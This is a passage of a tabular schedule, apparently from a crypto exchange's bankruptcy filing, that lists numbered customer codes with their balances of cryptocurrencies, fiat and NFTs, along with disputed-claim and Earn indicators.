| 07350816 | | CUSDT[469.00289515], USD[0.00] | | |
| 07350817 | | BAT[1], CUSDT[1], DOGE[8267.54996853], USD[0.00] | | |
| 07350818 | | BAT[7.60352877], USD[0.00] | | |
| 07350819 | | USD[10.00] | | |
| 07350820 | | USD[0.00] | | |
| 07350821 | | CUSDT[1], USD[0.01], USDT[1] | | |
| 07350822 | | USD[0.01] | | |
| 07350823 | | BTC[.00058575], CUSDT[5], DOGE[392.68441686], ETH[.00515021], ETHW[.00515021], TRX[1], USD[6.00] | | |
| 07350824 | | USD[10.00] | | |
| 07350825 | | CUSDT[1], USD[0.17] | | |
| 07350826 | | USD[10.00] | | |
| 07350827 | | CUSDT[1], TRX[1], USD[0.14] | | |
| 07350828 | | USD[10.00] | | |
| 07350829 | | USD[10.00] | | |
| 07350830 | | BTC[0], ETH[0], ETHW[0], USD[10.00] | | |
| 07350831 | | BRZ[3], CUSDT[17.72733533], DOGE[5885.21457612], NFT (294307269879576719#3264)[1], NFT (315373097092252344#7242)[1], NFT (326478412947083779#4368)[1], NFT (433567944367648882#565)[1], NFT (549489335767687606/Synesthesia #129)[1], NFT (553427918682395715/Fancy Frenchies #1178)[1], SHIB[2], SOL[15.06838241], TRX[6], USD[0.04] | Yes | |
| 07350832 | | USD[10.00] | | |
| 07350833 | | USD[10.00] | | |
| 07350834 | | USD[10.00] | | |
| 07350835 | | USD[10.00] | | |
| 07350836 | | DOGE[27.8371273], USD[0.00] | | |
| 07350837 | | USD[0.00] | Yes | |
| 07350838 | | USD[10.00] | | |
| 07350839 | | BRZ[1], BTC[.00951852], CUSDT[6], DOGE[4922.79132548], ETH[.04955729], ETHW[.04955729], LINK[2.17813489], TRX[1], USD[0.00] | | |
| 07350840 | | USD[10.00] | | |
| 07350841 | | USD[10.00] | | |
| 07350842 | | BRZ[1], CUSDT[1], USD[171.92] | | |
| 07350843 | | USD[10.00] | | |
| 07350844 | | USD[10.00] | | |
| 07350845 | | CAD[9.95], USD[2.00] | | |
| 07350846 | | USD[10.00] | | |
| 07350847 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07350848 | | BRZ[4], BTC[.08395563], CUSDT[4], DOGE[2700.2633055], ETH[.20469757], ETHW[.20469757], GRT[1], TRX[25221.30384623], USD[1.53], USDT[0] | | |
| 07350849 | | BRZ[2], CUSDT[2], DOGE[1], GRT[2], TRX[3], UNI[1], USD[0.00], USDT[2] | | |
| 07350850 | | DOGE[434.04491503], TRX[773.49977398], USD[10.00] | | |
| 07350851 | | USD[0.00], USDT[0.00000001] | | |
| 07350852 | | USD[10.00] | | |
| 07350853 | Contingent, Disputed | USD[0.00] | | |
| 07350854 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07350855 | | USD[10.00] | | |
| 07350856 | | USD[10.00] | | |
| 07350857 | | USD[10.00] | | |
| 07350858 | | USD[10.00] | | |
| 07350859 | | BTC[.00020128], USD[0.00] | | |
| 07350860 | | CUSDT[1], TRX[366.3049017], USD[10.00] | | |
| 07350861 | | CUSDT[1], DOGE[3.45947969], LINK[.00003703], TRX[1.00009902], USD[0.04] | | |
| 07350862 | | USD[10.00] | | |
| 07350863 | | USD[10.00] | | |
| 07350864 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07350865 | | BRZ[1], CUSDT[1], TRX[3], USD[292.75] | | |
| 07350866 | | DOGE[2], USD[0.00] | | |
| 07350867 | | TRX[2], USD[0.01] | | |
| 07350868 | | BRZ[0.00001514], BTC[0], DOGE[0], USD[10.00] | | |
| 07350869 | | CUSDT[2], USD[0.00] | | |
| 07350870 | | USD[10.00] | | |
| 07350871 | | BTC[0], CUSDT[10], DAI[0], DOGE[0], TRX[1], USD[0.00] | | |
| 07350872 | | USD[10.00] | | |
| 07350873 | | BTC[0], DOGE[0], ETH[1.25225290], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[1.97], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350874 | | DOGE[1], TRX[.05004238], USD[0.01] | | |
| 07350875 | | CUSDT[1], DOGE[4], LINK[.00003976], TRX[1], USD[0.01] | | |
| 07350876 | | USD[10.00] | | |
| 07350877 | | USD[19.91] | | |
| 07350878 | | USD[10.00] | | |
| 07350879 | | USD[12.98] | | |
| 07350880 | | DOGE[.00007905], USD[0.00] | | |
| 07350881 | | USD[10.00] | | |
| 07350882 | | USD[10.00] | | |
| 07350883 | | USD[10.00] | | |
| 07350884 | | USD[0.00] | Yes | |
| 07350885 | | BRZ[3], CUSDT[.00350129], CUSDT[1], DOGE[15095.15642548], ETH[.14073584], ETHW[.13976795], TRX[693.62863149], USD[0.00] | Yes | |
| 07350886 | | ETH[.00000001], USD[0.00], USDT[0.00000001] | | |
| 07350887 | | USD[10.00] | | |
| 07350889 | | USD[10.00] | | |
| 07350890 | | USD[10.00] | | |
| 07350892 | | USD[10.00] | | |
| 07350893 | | CUSDT[2], USD[0.00] | Yes | |
| 07350894 | | CUSDT[8], DOGE[3289.80687897], ETH[.52789177], ETHW[.52789177], LTC[.33028106], SHIB[10074756.40193453], TRX[3], USD[25.00], USDT[1] | | |
| 07350895 | | USD[10.00] | | |
| 07350896 | | USD[10.00] | | |
| 07350897 | | CUSDT[6], DOGE[2], SHIB[3280029.20648144], USD[3.44] | Yes | |
| 07350898 | | USD[10.00] | | |
| 07350899 | | BRZ[1], CUSDT[6], TRX[3], USD[0.00] | | |
| 07350900 | | USD[0.00] | | |
| 07350901 | | USD[0.02] | | |
| 07350902 | | USD[10.00] | | |
| 07350903 | | USD[10.00] | | |
| 07350904 | | USD[10.00] | | |
| 07350905 | | BAT[0], DOGE[1], ETHW[56.88142991], KSHIB[0], LINK[0], LTC[0], NEAR[0], NFT (309997586364026884/Solninjas #9901)[1], NFT (329838756119441875/Solninjas #1349)[1], SOL[44.53408980], TRX[0], USD[0.00] | Yes | |
| 07350906 | | USD[10.00] | | |
| 07350907 | | USD[0.00] | | |
| 07350908 | | BRZ[1], BTC[0], CUSDT[4], TRX[1], USD[0.00] | | |
| 07350909 | | CUSDT[3], DOGE[.80994482], USD[0.72] | | |
| 07350910 | | USD[10.00] | | |
| 07350911 | | USD[10.00] | | |
| 07350912 | | USD[10.00] | | |
| 07350914 | | CUSDT[6], DOGE[117.43481028], GRT[2.53846921], MATIC[2.934504], SOL[23.50140529], TRX[1214.41526427], UNI[.99151331], USD[0.16] | | |
| 07350915 | | USD[73.18], USDT[0] | | |
| 07350917 | | BAT[.99999737], BRZ[1], DAI[.35548659], DOGE[7632.31852117], TRX[227.87243344], USD[0.00] | | |
| 07350918 | | USD[0.00] | | |
| 07350919 | | BAT[.0000244], CUSDT[3], DOGE[1], GBP[0.00], TRX[1], USD[0.00] | | |
| 07350920 | | USD[10.00] | | |
| 07350921 | | CUSDT[2], DOGE[45.20390475], USD[0.00] | | |
| 07350922 | | AUD[1.35], AVAX[.00964361], BCH[.00001149], BRZ[.8280565], BTC[.00006397], CAD[1.25], CUSDT[6], DOGE[46.95569681], ETH[.00340769], ETHW[.00336662], EUR[0.84], GBP[0.71], KSHIB[32.33437972], PAXG[.00004157], SHIB[55721.05396084], SOL[.02913774], SUSHI[.34910888], TRX[28.17469253], USD[10.32], USDT[.9949863], YFI[.00002476] | Yes | |
| 07350924 | | USD[10.00] | | |
| 07350925 | | USD[10.00] | | |
| 07350926 | | DOGE[4988.96031079], USD[10.00] | | |
| 07350927 | | USD[10.00] | | |
| 07350928 | | USD[10.00] | | |
| 07350929 | | USD[0.00] | | |
| 07350930 | | USD[10.00] | | |
| 07350931 | Contingent, Disputed | USD[0.00] | Yes | |
| 07350932 | | USD[10.96] | Yes | |
| 07350933 | | CUSDT[1], DOGE[581.61548055], ETH[0], ETHW[0], SUSHI[0], USD[0.00] | | |
| 07350934 | | BRZ[1], CUSDT[1], TRX[2], USD[31.25] | | |
| 07350935 | | BRZ[0], DOGE[0], USD[0.00] | | |
| 07350936 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07350937 | | USD[10.00] | | |
| 07350939 | | USD[10.00] | | |
| 07350940 | | DOGE[195.3580581], USD[0.00] | | |
| 07350941 | | ALGO[702.5823774], DOGE[4], ETHW[.07801598], TRX[3], USD[0.00] | Yes | |
| 07350942 | | USD[10.00] | | |
| 07350943 | | USD[10.00] | | |
| 07350944 | | USD[10.00] | | |
| 07350945 | | BRZ[1], DOGE[0], USD[0.00] | | |
| 07350946 | | CUSDT[2], DOGE[2911.41128607], SHIB[1], USD[0.00] | Yes | |
| 07350947 | | USD[1.97] | | |
| 07350948 | | USD[10.00] | | |
| 07350949 | | GRT[8.95768173], USD[0.00] | | |
| 07350950 | | USD[11.09] | Yes | |
| 07350952 | | USD[10.00] | | |
| 07350953 | | USD[10.00] | | |
| 07350954 | | BRZ[0], USD[0.00], USDT[0] | | |
| 07350955 | | CUSDT[1], USD[0.81] | | |
| 07350956 | | USD[10.00] | | |
| 07350957 | | USD[10.00] | | |
| 07350958 | | USD[10.00] | | |
| 07350959 | | BRZ[1], CUSDT[9], SHIB[34.24284129], TRX[3], USD[0.44] | Yes | |
| 07350960 | | USD[10.00] | | |
| 07350962 | | USD[10.00] | | |
| 07350963 | | CUSDT[2], DOGE[5732.06740284], USD[0.00] | Yes | |
| 07350964 | | CUSDT[1], SOL[.00019018], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07350965 | | DOGE[138.00171039], USD[0.00] | | |
| 07350966 | | USD[10.00] | | |
| 07350967 | | USD[10.00] | | |
| 07350968 | | BAT[1], BRZ[2], CUSDT[3], GRT[1], TRX[2], USD[0.00] | | |
| 07350969 | | BAT[1], BRZ[4], CUSDT[13], DOGE[883.00752081], ETH[.1157419], ETHW[0], GRT[1], LINK[13.96451655], SHIB[30325310.85505065], TRX[4], USD[0.03], USDT[0.00000001] | Yes | |
| 07350971 | | USD[10.00] | | |
| 07350972 | | CUSDT[2], DOGE[4948.66718851], USD[0.00] | Yes | |
| 07350973 | | DOGE[18.68157371], USD[0.00] | | |
| 07350974 | | TRX[2], USD[0.01] | | |
| 07350975 | | BAT[1], BCH[0], BRZ[2], BTC[0], CUSDT[6], DOGE[0], GRT[1], LINK[0], SHIB[79635867.08354532], SOL[0], TRX[3], USD[0.00], USDT[0] | | |
| 07350976 | | USD[10.00] | | |
| 07350977 | | BRZ[.288], DOGE[9.96], TRX[932.256], USD[0.08] | | |
| 07350978 | | CUSDT[1], DOGE[1], ETH[.11100836], ETHW[.11100836], TRX[1], USD[0.00] | | |
| 07350979 | | DOGE[1], UNI[0], USD[0.00] | | |
| 07350980 | | CUSDT[1], DOGE[17.69900871], USD[0.05] | | |
| 07350981 | | USD[0.05] | | |
| 07350982 | | USD[0.02] | | |
| 07350983 | | BRZ[1], BTC[.00001175], CUSDT[3], DOGE[1.85154946], TRX[2], USD[0.00] | | |
| 07350984 | | BTC[0], USD[10.00], USDT[0] | | |
| 07350985 | | USD[10.00] | | |
| 07350987 | | DOGE[1], USD[0.00] | | |
| 07350988 | | BRZ[1], DOGE[1], GRT[0], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07350989 | | USD[10.00] | | |
| 07350990 | | USD[10.00] | | |
| 07350991 | | USD[10.00] | | |
| 07350993 | | USD[10.00] | | |
| 07350994 | | CUSDT[1], DOGE[2640.67978793], USD[0.00] | Yes | |
| 07350995 | | BRZ[0], DOGE[0.00049572], USD[0.00] | | |
| 07350997 | | BCH[0], BTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07350998 | | USD[10.00] | | |
| 07350999 | | USD[10.00] | | |
| 07351000 | | BRZ[1], CUSDT[2], DOGE[.25], TRX[1], USD[8.72] | | |
| 07351001 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351002 | | CUSDT[1], DOGE[40.50520623], USD[30.59] | | |
| 07351003 | | USD[0.00] | | |
| 07351004 | | BRZ[2], BTC[0], CUSDT[36], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], NFT (42756654200701112)/Humpty Dumpty #579)[1], SHIB[21], SOL[0], SUSHI[0.00009476], TRX[5], UNI[0], USD[0.06], YFI[0] | Yes | |
| 07351005 | | USD[10.00] | | |
| 07351006 | | USD[10.00] | | |
| 07351007 | | BAT[4], BRZ[6], CUSDT[4], DOGE[1], GRT[4], TRX[8], USD[1639.71], USDT[2] | | |
| 07351008 | | BTC[.0000533], LINK[.085], MATIC[.07115323], SOL[.005], USD[0.01] | | |
| 07351009 | | CUSDT[3], DOGE[383.46818206], USD[0.48] | | |
| 07351010 | | CUSDT[1], USD[0.00] | | |
| 07351011 | | USD[10.00] | | |
| 07351012 | | USD[0.00] | | |
| 07351013 | | USD[0.00] | | |
| 07351014 | | BAT[.00008097], BRZ[8.14793335], CUSDT[20], ETH[0], SOL[.00554722], TRX[4], USD[0.01], USDT[0] | | |
| 07351015 | | TRX[201.80987128], USD[0.00] | | |
| 07351017 | | CUSDT[3], DOGE[1.20817709], USD[20.13] | | |
| 07351018 | | USD[10.00] | | |
| 07351019 | | DOGE[1415.61812777], USD[0.00] | | |
| 07351021 | | USD[10.00] | | |
| 07351022 | | BAT[4.32161844], BRZ[7.47350092], CUSDT[7], DOGE[3.99262391], GRT[1.00498957], KSHIB[139.83880221], LINK[1.10468606], NFT (46751551549973954)/DOTB #4920)[1], SHIB[13450.36902286], SOL[.00083012], SUSHI[1.40184942], TRX[0], USD[0.80], YFI[.00000216] | Yes | |
| 07351023 | | USD[10.00] | | |
| 07351024 | | CUSDT[238.19598644], DOGE[897.39287496], USD[0.00], USDT[0] | | |
| 07351025 | | USD[10.00] | | |
| 07351026 | | USD[10.00] | | |
| 07351027 | | USD[10.00] | | |
| 07351028 | | BRZ[4], CUSDT[3], TRX[2], USD[0.01] | | |
| 07351029 | | DOGE[482.91981432], USD[10.00] | | |
| 07351030 | | CUSDT[1], DOGE[107.08438142], USD[0.00] | | |
| 07351031 | | BRZ[3], CUSDT[13], DOGE[.00505463], SOL[.11100495], SUSHI[.0021721], TRX[5], USD[0.00] | Yes | |
| 07351032 | | USD[10.00] | | |
| 07351033 | | DOGE[.0001769], TRX[1], USD[63.89] | | |
| 07351034 | | USD[10.00] | | |
| 07351035 | | USD[10.00] | | |
| 07351036 | | DOGE[1], USD[0.67] | | |
| 07351037 | | CUSDT[5], DOGE[2066.16386328], USD[0.06] | | |
| 07351038 | | DOGE[0], USD[1.13] | Yes | |
| 07351039 | | USD[0.00] | | |
| 07351040 | | USD[10.00] | | |
| 07351041 | | CUSDT[4], DOGE[1], TRX[0.11769816], USD[0.00], USDT[0] | Yes | |
| 07351042 | | USD[10.00] | | |
| 07351043 | | BAT[2], DOGE[38055.1396158], ETHW[.00000001], GRT[2], SHIB[2], TRX[5], USD[3481.30], USDT[0.00000001] | Yes | |
| 07351044 | | USD[10.00] | | |
| 07351045 | | USD[10.00] | | |
| 07351046 | | BAT[445.89200255], BCH[0], BRZ[5.07952967], BTC[0.00000016], CUSDT[8], DAI[0], DOGE[3], ETH[0], GRT[2075.66716717], KSHIB[31015.80326550], LINK[0], LTC[0], MKR[0], NFT (48788695395458690/Baddies #4879)[1], SHIB[2], SOL[3.27633240], SUSHI[0], TRX[0.06719544], UNI[92.15325638], USD[0.00], USDT[2.13517255], YFI[0] | Yes | |
| 07351047 | | USD[10.00] | | |
| 07351048 | | BRZ[1], CUSDT[1], TRX[2], USD[0.17] | | |
| 07351049 | | BRZ[2], BTC[.00034181], ETH[.19473666], ETHW[.19473666], TRX[2], USD[0.00] | | |
| 07351050 | | USD[10.00] | | |
| 07351051 | | ETH[.00573646], ETHW[.00566806], USD[0.00] | Yes | |
| 07351052 | | USD[35.00] | | |
| 07351053 | | BTC[.00699421], CUSDT[2], SHIB[186554.10803212], TRX[2], USD[0.00] | | |
| 07351054 | | USD[10.00] | | |
| 07351055 | | DOGE[141.6819018], USD[0.00] | | |
| 07351056 | | BAT[1], CUSDT[1], DOGE[.0006966], TRX[2], USD[0.31], USDT[0.00004382] | | |
| 07351057 | | BRZ[1], CUSDT[13.40189343], DOGE[1.58688977], KSHIB[.38163809], LTC[.00007075], SHIB[3311627.45810728], TRX[8.90637675], USD[0.73], USDT[1.10952898] | Yes | |
| 07351058 | | USD[10.00] | | |
| 07351059 | | BRZ[1], BTC[.00038917], CUSDT[3], DOGE[2], EUR[0.00], TRX[3], USD[0.34] | Yes | |
| 07351061 | | DOGE[2994], SUSHI[19.95], USD[590.95] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351062 | | USD[10.00] | | |
| 07351063 | | USD[10.00] | | |
| 07351064 | | CUSDT[3], TRX[1], USD[0.46] | Yes | |
| 07351066 | | USD[10.00] | | |
| 07351067 | | DOGE[1], USD[0.00] | Yes | |
| 07351068 | | USD[10.00] | | |
| 07351069 | | CUSDT[2], DOGE[0], TRX[.0000497], USD[10.54] | | |
| 07351070 | | GRT[5.32551848], USD[0.00] | Yes | |
| 07351071 | | DOGE[1], USD[0.00] | | |
| 07351072 | | CUSDT[1], DOGE[471.45805678], SOL[.05591618], USD[0.00] | | |
| 07351073 | | USD[10.00] | | |
| 07351074 | | USD[10.00] | | |
| 07351075 | | DOGE[.852], USD[54.07] | | |
| 07351076 | | USD[10.00] | | |
| 07351077 | | USD[0.00] | | |
| 07351078 | | USD[0.00], USDT[0] | | |
| 07351079 | | DOGE[1], USD[0.01] | | |
| 07351080 | | SHIB[10000.00162723], USD[0.68] | | |
| 07351081 | | BTC[.00566315], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07351082 | | BAT[1], CUSDT[3], USD[0.01] | | |
| 07351083 | | USD[10.96] | Yes | |
| 07351084 | | BTC[.10627457], CUSDT[4], DOGE[5], ETH[.33920447], ETHW[.33920447], GRT[1], MATIC[3.2592273], USD[0.00], USDT[0] | | |
| 07351085 | | USD[10.00] | | |
| 07351086 | | USD[10.00] | | |
| 07351087 | | USD[10.00] | | |
| 07351088 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07351089 | | USD[10.00] | | |
| 07351090 | | USD[10.00] | | |
| 07351091 | | USD[10.00] | | |
| 07351093 | | BRZ[1], CUSDT[5], DOGE[807.62296539], ETH[.1497161], ETHW[.1497161], TRX[1], USD[0.54] | | |
| 07351094 | | DOGE[719.57586909], TRX[131.54235782], USD[6.00] | | |
| 07351095 | | BTC[0], DOGE[1], USD[0.00], USDT[1] | | |
| 07351096 | | DOGE[4251.6161146], TRX[1], USD[0.00] | | |
| 07351097 | | BTC[0], CUSDT[4], DOGE[0], USD[0.00] | | |
| 07351098 | | BRZ[4], BTC[0], CUSDT[10], DOGE[0], GRT[1], TRX[4], USD[0.00], USDT[1] | | |
| 07351099 | | USD[10.00] | | |
| 07351100 | | TRX[1], USD[0.01] | | |
| 07351101 | | USD[10.00] | | |
| 07351102 | | USD[10.00] | | |
| 07351103 | | USD[10.00] | | |
| 07351104 | | BTC[0], USD[0.01], USDT[0.00000001] | | |
| 07351107 | | USD[0.01] | | |
| 07351108 | | USD[10.00] | | |
| 07351109 | | DOGE[8.75078701], TRX[2], USD[0.00] | | |
| 07351110 | | USD[10.00] | | |
| 07351111 | | USD[10.00] | | |
| 07351112 | | USD[0.01] | | |
| 07351113 | | DOGE[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07351114 | | USD[10.00] | | |
| 07351115 | | CUSDT[1], DOGE[1.32698813], USD[93.50] | | |
| 07351117 | | USD[10.00] | | |
| 07351118 | | DOGE[1], TRX[1.08170351], USD[0.03] | Yes | |
| 07351119 | | CUSDT[1], DOGE[599.77610276], TRX[2], USD[0.00] | | |
| 07351120 | | USD[10.00] | | |
| 07351121 | | BRZ[1], CUSDT[12.48275458], DOGE[315.87576788], TRX[731.01742526], USD[0.00] | Yes | |
| 07351122 | | USD[10.00] | | |
| 07351123 | | CUSDT[1], USD[0.01] | | |
| 07351124 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351125 | | BTC[.2362543], ETH[.59630973], ETHW[.59605934], USD[0.21], USDT[0] | Yes | |
| 07351126 | | USD[0.01], USDT[0.00000001] | Yes | |
| 07351127 | | BRZ[1], CUSDT[1], DOGE[733.00994163], USD[0.00] | | |
| 07351128 | | BRZ[2], CUSDT[19], DOGE[3], SUSHI[31.9084977], TRX[2], USD[0.00] | Yes | |
| 07351129 | | BRZ[1], CUSDT[9], DOGE[2], GRT[1], NFT (419294387774523780/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #91)[1], NFT (542337751488030449/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #74)[1], SHIB[2491535.93556896], USD[0.01] | Yes | |
| 07351130 | | CUSDT[1], DOGE[1.48505327], TRX[1], USD[0.41] | | |
| 07351131 | | USD[10.00] | | |
| 07351132 | | USD[10.00] | | |
| 07351133 | | USD[10.00] | | |
| 07351134 | | USD[10.00] | | |
| 07351135 | | USD[10.00] | | |
| 07351136 | | DOGE[1], USD[0.00] | | |
| 07351137 | | DOGE[1.25195567], USD[0.93] | | |
| 07351138 | | BTC[.00020331], USD[0.00] | | |
| 07351139 | | CUSDT[95.3894623], USD[0.00] | Yes | |
| 07351140 | | CUSDT[2], LINK[1], TRX[3], USD[0.00], USDT[1] | | |
| 07351141 | | USD[10.00] | | |
| 07351142 | | CUSDT[4], DOGE[199.22236413], ETH[.00742794], ETHW[.00742794], TRX[1], USD[0.00] | | |
| 07351143 | | CUSDT[3], DOGE[.00000375], TRX[2], USD[0.02] | | |
| 07351144 | | BAT[0], BCH[0], BTC[0], CUSDT[2], DOGE[0], ETH[0.00000002], ETHW[0.00000002], GRT[0], LTC[0], SUSHI[0], TRX[0], USD[0.00], USDT[3.75929062] | Yes | |
| 07351145 | | USD[10.00] | | |
| 07351146 | | CUSDT[3], DOGE[1337.55748472], TRX[1], USD[0.00] | | |
| 07351147 | | USD[10.00] | | |
| 07351148 | | CUSDT[1], DOGE[53.43302061], TRX[2], USD[0.01] | | |
| 07351149 | | SOL[0], USD[0.00] | | |
| 07351150 | | USD[10.00] | | |
| 07351151 | | USD[0.00] | Yes | |
| 07351152 | | CUSDT[1.99339755], DOGE[0.00024979], USD[0.01] | | |
| 07351153 | | BTC[.00083066], DOGE[756.89125438], ETH[.02072684], ETHW[.02072684], SUSHI[1.56223972], TRX[1], USD[0.00] | | |
| 07351154 | | USD[10.00] | | |
| 07351155 | | DOGE[1], USD[0.00] | Yes | |
| 07351156 | | USD[10.00] | | |
| 07351158 | | CUSDT[2], DOGE[.00007083], SOL[.00005837], SUSHI[.0000152], TRX[1], USD[0.00] | | |
| 07351159 | | TRX[1], USD[0.00] | | |
| 07351160 | | USD[10.00] | | |
| 07351161 | | DOGE[.065], SOL[0], USD[0.52], USDT[0.00000001] | | |
| 07351162 | | USD[10.00] | | |
| 07351163 | | BTC[.00041792], DOGE[1], USD[0.00] | | |
| 07351164 | | USD[10.00] | | |
| 07351165 | | USD[10.00] | | |
| 07351166 | | AAVE[.00018915], BAT[1.00494367], BRZ[4], CUSDT[1], DOGE[18.81187712], ETH[.00017869], ETHW[.00017869], GRT[.00004056], SUSHI[.00762279], TRX[6.58722539], UNI[.01378473], USD[0.00] | Yes | |
| 07351167 | | USD[0.00] | | |
| 07351168 | | AVAX[.87707531], BRZ[4], CUSDT[10], DOGE[0], GRT[0], SHIB[1], TRX[86.80833986], USD[0.00], USDT[1.09885014], YFI[0] | Yes | |
| 07351169 | | DOGE[122.79564925], USD[0.00] | | |
| 07351170 | | USD[10.00] | | |
| 07351171 | | BAT[3], BCH[0], BRZ[2], CUSDT[4], DOGE[0.64957241], ETH[0], GRT[2], LINK[0], PAXG[0], SOL[0], SUSHI[0], TRX[5.87616300], UNI[0], USD[0.00], USDT[0] | | |
| 07351172 | | BTC[0], CUSDT[3], DOGE[1], TRX[0], USD[0.00] | | |
| 07351173 | | CUSDT[6], DOGE[116.21674348], TRX[1], USD[0.00], USDT[1.09367432] | Yes | |
| 07351174 | | USD[10.00] | | |
| 07351175 | | BAT[1], BRZ[1], CUSDT[3], GRT[1], TRX[1.0490117], USD[0.00] | | |
| 07351176 | | TRX[1], USD[0.00] | | |
| 07351177 | | USD[10.00] | | |
| 07351178 | | USD[10.00] | | |
| 07351180 | | CUSDT[1], SOL[0], USD[0.01] | | |
| 07351181 | | DOGE[193.5852366], TRX[1], USD[9.04] | | |
| 07351182 | | USD[10.00] | | |
| 07351183 | | TRX[1], USD[0.01] | | |
| 07351184 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351185 | | DOGE[2], LINK[.00003069], SHIB[2], USD[107.06], USDT[1.10669542] | Yes | |
| 07351187 | | DOGE[139.67957226], TRX[1], USD[0.00] | | |
| 07351188 | | DOGE[133.02965324], USD[0.00] | | |
| 07351189 | | BRZ[1], DOGE[60.70703211], USD[14.40] | | |
| 07351191 | | BRZ[1], CUSDT[9], DOGE[1539.3798371], LTC[3.46523107], SHIB[100105.74550581], SOL[.02476584], TRX[306.16898374], USD[0.00] | | |
| 07351192 | | BAT[1], CUSDT[1], TRX[1], USD[0.01], USDT[1] | | |
| 07351193 | | AAVE[0], BCH[0], BTC[0], DOGE[5], GRT[0], MATIC[0], SHIB[8], TRX[1], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07351194 | | USD[10.00] | | |
| 07351195 | | USD[10.00] | | |
| 07351197 | | BAT[0], BRZ[1], CUSDT[3], DOGE[0], GRT[0], LTC[0], SOL[0.00000245], SUSHI[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07351198 | | CAD[0.00], USD[0.00] | | |
| 07351199 | | BRZ[1], CUSDT[8], DOGE[1], SOL[.00002], TRX[1], USD[0.00] | | |
| 07351200 | | USD[10.00] | | |
| 07351201 | | AAVE[0], BAT[0], DOGE[0], ETH[0], ETHW[0], GRT[0], MATIC[0], SHIB[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | Yes | |
| 07351202 | | USD[10.00] | | |
| 07351204 | | CUSDT[8], DOGE[1], TRX[4], USD[0.01] | | |
| 07351205 | | USD[10.00] | | |
| 07351206 | | USD[10.00] | | |
| 07351207 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07351208 | | USD[10.00] | | |
| 07351209 | | USD[10.00] | | |
| 07351210 | | USD[10.00] | | |
| 07351211 | | CUSDT[1], DOGE[1.00002931], TRX[1], USD[0.00] | | |
| 07351212 | | DOGE[0], NFT (513989004986313402/Entrance Voucher #2747)[1], SHIB[1], USD[91.38] | Yes | |
| 07351215 | | USD[10.00] | | |
| 07351216 | | BRZ[1], CUSDT[2], DOGE[355.84181982], GRT[1], TRX[1], USD[0.00] | | |
| 07351217 | | CUSDT[1], SOL[1.23866049], TRX[342.40137616], USD[0.00] | Yes | |
| 07351218 | | BAT[6], BRZ[10], CUSDT[19], DOGE[29], TRX[17], USD[5820.02], USDT[3] | | |
| 07351219 | | ETH[.00000002], ETHW[.00000002], SHIB[1.25462609], SOL[.00000046], TRX[1], UNI[.00000353], USD[0.00] | Yes | |
| 07351220 | | USD[10.00] | | |
| 07351221 | | CUSDT[2], USD[0.69] | | |
| 07351223 | | USD[10.00] | | |
| 07351224 | | USD[0.01] | | |
| 07351225 | | GBP[0.00], USD[0.00] | | |
| 07351226 | | CUSDT[1], DOGE[1.13990641], USD[0.00] | | |
| 07351227 | | USD[10.00] | | |
| 07351228 | | BTC[0], DOGE[0.38238794], ETH[0], USD[0.00] | | |
| 07351229 | | BRZ[1], CUSDT[1], GRT[.00000001], MATIC[0], TRX[4], USD[0.00] | Yes | |
| 07351230 | | USD[10.00] | | |
| 07351231 | | USD[0.00], USDT[0.00000001] | Yes | |
| 07351234 | | GRT[1.22449452], USD[0.00] | | |
| 07351235 | | USD[10.00] | | |
| 07351236 | | USD[11.92] | | |
| 07351237 | | CUSDT[2], DOGE[1], GRT[2.14876758], MATIC[41.63014991], SOL[2.13637443], USD[0.01] | Yes | |
| 07351238 | | USD[10.00] | | |
| 07351239 | | BTC[.00017747], USD[0.00] | Yes | |
| 07351240 | | USD[10.00] | | |
| 07351242 | | USD[10.00] | | |
| 07351243 | | DOGE[0], USD[0.00] | | |
| 07351244 | | BAT[11.43135057], BCH[.09117203], BRZ[39.9852515], BTC[.01184386], CUSDT[4967.80238795], DOGE[12207.76556883], ETH[.0501752], ETHW[.04955194], KSHIB[281.69620037], LINK[.3971289], LTC[.24565962], SHIB[4], TRX[190.72666654], UNI[.18377924], USD[74.08], YFI[.00035075] | Yes | |
| 07351245 | | USD[10.00] | | |
| 07351246 | | SHIB[0], USD[0.00] | | |
| 07351248 | | BTC[0], CUSDT[2], GRT[316.29948862], USD[0.12] | Yes | |
| 07351249 | | CUSDT[1], DOGE[126.63338928], TRX[1], USD[0.94] | | |
| 07351250 | | USD[10.00] | | |
| 07351251 | | DOGE[1], USD[12.39] | | |
